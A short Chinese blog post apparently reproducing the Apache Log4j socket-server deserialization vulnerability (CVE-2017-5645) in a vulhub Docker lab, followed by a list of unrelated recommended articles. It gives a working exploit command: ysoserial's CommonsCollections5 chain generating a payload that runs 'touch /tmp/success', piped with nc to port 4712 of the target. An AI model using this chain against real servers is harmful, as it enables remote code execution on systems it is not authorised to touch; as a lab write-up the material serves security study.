vulhub中Apache Log4j Server 反序列化命令执行漏洞复现(CVE-2017-5645)

余生有个小酒馆2024-02-20 12:59

Apache Log4j是一个用于Java的日志记录库,其支持启动远程日志服务器。Apache Log4j 2.8.2之前的2.x版本中存在安全漏洞。攻击者可利用该漏洞执行任意代码。

1.我们使用ysoserial生成payload,然后直接发送给`your-ip:4712`端口即可。

复制代码 
java -jar ysoserial-master-v0.0.5-gb617b7b-16.jar CommonsCollections5 "touch /tmp/success" | nc your-ip 4712

工具地址 https://github.com/frohoff/ysoserial

需要注意JDK版本的问题 https://github.com/frohoff/ysoserial/issues/203

2.然后执行`docker compose exec log4j bash`进入容器,可见 /tmp/success 已成功创建:

相关推荐
薛定猫AI11 小时前
【深度解析】DeepSeek V4 + Cloud Code:构建低成本、高吞吐的混合 AI 编码工作流
人工智能·log4j
卷卷说风控19 小时前
【卷卷观察】Claude Code 换脑子:DeepSeek V4 Pro 让你的 AI 编程便宜17倍
log4j
运维全栈笔记2 天前
Linux安装配置Tomcat保姆级教程:从部署到性能调优
linux·服务器·中间件·tomcat·apache·web
❀͜͡傀儡师3 天前
Apache Doris 4.0.0 存算分离手动部署指南
apache·doris 4.0
likerhood3 天前
SLF4J: Failed to load class “StaticLoggerBinder“ 解决
java·log4j·maven
:mnong3 天前
理解 AI 时代的软件范式
人工智能·log4j
SuperherRo5 天前
服务攻防-Java组件安全&Solr搜索&Shiro鉴权&Log4j日志&JDK高版本绕过&CVE历史漏洞
java·log4j·solr·shiro·cve
软泡芙5 天前
【C# 】各种等待大全:从入门到精通
开发语言·c#·log4j
DolphinScheduler社区6 天前
DolphinScheduler 3.3.2 如何调用 DataX 3.0 + SeaTunnel 2.3.12?附 Demo演示!
java·spark·apache·海豚调度·大数据工作流调度
热门推荐
01要裂开了!ChatGPT要手机号验证了?注册Codex要求验证电话号码怎么办?2026年登陆Codex要手机号验证的解决办法02GitHub 镜像站点03Codex 接入 DeepSeek API 完整配置文档04零基础教你claude code 接入 deepseek V405【AI】2026 年具身智能模型和世界模型总结06几个好用的ip纯净度检测网站07裂开!ChatGPT 居然开始要手机号验证,附详细解决方法08CC-Switch & Claude 基于 Linux 服务器安装使用指南092026年AI前瞻:量子AI、具身智能与科学发现的新纪元10在Windows 11上安装Docker的踩坑记录